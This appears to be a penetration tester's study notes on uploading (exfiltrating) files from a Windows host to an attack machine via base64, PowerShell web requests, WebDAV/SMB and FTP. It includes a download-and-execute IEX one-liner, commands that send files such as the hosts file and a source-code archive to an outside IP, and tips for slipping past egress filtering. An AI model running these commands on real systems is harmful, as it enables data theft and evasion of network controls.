Windows - Upload

# Go-To [[smbserver.py]] # PowerShell Base64 Encode & Decode Encode File Using PowerShell ```powershell PS C:\wook> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte)) IyBDb3B5cmlnaHQgKGMpIDE5OTMt... PS C:\wook> Get-FileHash "C:\Windows\system32\drivers\etc\hosts" -Algorithm MD5 | select Hash Hash ---- 3688374325B992DEF12793500307566D ``` Decode Base64 String in Linux ```bash echo IyBDb3B5cmlnaHQgKGMpIDE5OTMt... | base64 -d > hosts ``` check hash ```bash md5sum hosts 3688374325b992def12793500307566d hosts ``` # PowerShell Web Uploads PowerShell doesn't have a built-in function for upload operations, but we can use `Invoke-WebRequest` or `Invoke-RestMethod` to build our upload function. We also need a web server that accepts uploads. For web server, we can use `uploadserver`, an extended module of the Python HTTP.server module. Installing a Configured WebServer with Upload ```bash pip3 install uploadserver python3 -m uploadserver ``` Now we can use a PowerShell script `PSUpload.ps1` which uses `Inovke-RestMethod` to perform the upload operations. PowerShell Script to Upload a File to Python Upload Server ```powershell PS C:\wook> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') PS C:\wook> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts [+] File Uploaded: C:\Windows\System32\drivers\etc\hosts [+] FileHash: 5E7241D66FD77E9E8EA866B6278B2373 ``` # PowerShell Base64 Upload Another way to use PowerShell and Base64 encoded files for upload operations is by using `Invoke-WebRequest` or `Invoke-RestMethod` together with [[netcat]]. We can use Netcat to listen in on a port we specify and send the file as a `POST` request. ```powershell PS C:\wook> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)) PS C:\wook> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64 ``` catch the base64 data with Netcat and use the base64 application with the decode option to convert the string to the file. ```bash nc -lvnp 8000 ``` ```bash echo <base64> | base64 -d w 0 > hosts ``` # SMB Uploads - Companies usually allow outbound traffic using HTTP/HTTPS. - Companies don't allow the SMB protocol out of their internal network because this can open them up to potential attacks. - An alternative is to run SMB over HTTP with `WebDav`. - `WebDav` is an extension of HTTP which enables a webserver to behave like a fileserver. - `WebDav` can also use HTTPS. To set up WebDav server, we need to install two python modules: `wsgidav` and `cheroot`. ```bash sudo pip3 install wsgidav cheroot ``` ```bash sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous ``` connecting to the Webdav share now we can attempt to connect to the share using the `DavWWWRoot` directory - `DavWWWRoot` is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. The DavWWWRoot keyword tells the Mini-Redirector driver, which handles WebDAV requests that you are connecting to the root of the WebDAV server. ```powershell dir \\<IP>\DavWWWRoot ``` Uploading Files using SMB - If there are no SMB restrictions, we can use impacket-smbserver the same way it's set up for download opeartions ```powershell C:\wook> copy C:\Users\john\Desktop\SourceCode.zip \\<IP>\DavWWWRoot C:\wook> copy C:\Users\john\Desktop\SourceCode.zip \\<IP>\sharefolder ``` # FTP Uploads Uploading files using FTP is very similar to downloading files. We can use PowerShell or the FTP client to complete the operation. We need to specify the option `--write` to allow clients to upload files to our attack host. ```bash sudo python3 -m pyftpdlib --port 21 --write ``` PowerShell Upload File ```powershell PS C:\wook> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts') ``` Create a Command File for the FTP client to upload a file ```powershell C:\wook> echo open 192.168.49.128 > ftpcommand.txt C:\wook> echo USER anonymous >> ftpcommand.txt C:\wook> echo binary >> ftpcommand.txt C:\wook> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt C:\wook> echo bye >> ftpcommand.txt C:\wook> ftp -v -n -s:ftpcommand.txt ftp> open 192.168.49.128 Log in with USER and PASS first. ftp> USER anonymous ftp> PUT c:\windows\system32\drivers\etc\hosts ftp> bye ```